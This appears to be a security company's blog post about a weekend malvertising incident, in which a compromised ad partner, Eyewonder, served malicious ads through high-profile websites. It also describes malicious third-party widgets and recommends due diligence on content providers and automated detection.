According to reports on Twitter as well as on ZDNet over the weekend, visitors to several high-profile websites were blocked from accessing parts of the sites because an advertising partner, Eyewonder, suffered a malware attack.
Malicious advertisements are increasingly being used by attackers as a vector for distributing malware via legitimate sites. In this case, what happens is that the malicious code that the website ends up serving to users is being sourced in from an advertising partner. The website itself has not been compromised by attackers -- rather, the ad network used by the site has been compromised. Attackers often use malicious ads to achieve scale and avoid detection. It would have been difficult for the attackers to infect a large number of high-profile websites directly; instead, they were able to leverage the trusted relationship between the websites and their ad network to get malicious content (in this case an ad) served to the sites' end users. In some cases, Dasient has added certain ad networks to its internal blacklist to inform its customers where there is a risk that ads may result in infecting their users.
In addition to malware coming in through ads, we have also seen cases where malicious code comes into a website via content mash-ups or third-party widgets. For example, third-party widgets such as traffic counters have been used to infect websites (see section 4.4 of "The Ghost in the Browser"). We have spoken to website owners who explained that their sites were infected not through attackers exploiting a vulnerability in the website, but because they included a plug-in or widget that ended up being malicious. In some cases, the widget is benign for a period of time (even years), but then drastically changes behavior to become malicious (either because the widget provider was itself malicious or, more likely, because the widget provider's servers were hacked).
Attackers will continue to find network and web application vulnerabilities in websites that they can exploit to directly plant malicious code. However, it is clear from the Eyewonder incident that the attackers will also seek ways of exploiting the trusted relationships between websites and their third-party advertising or content partners to create the same effect. The nature of the open web encourages websites to mash up best-of-breed content (and ads) from various sources. To reduce risk, it is important for websites to perform due diligence on all third-party content and ad providers, as well as employ automated detection and remediation services.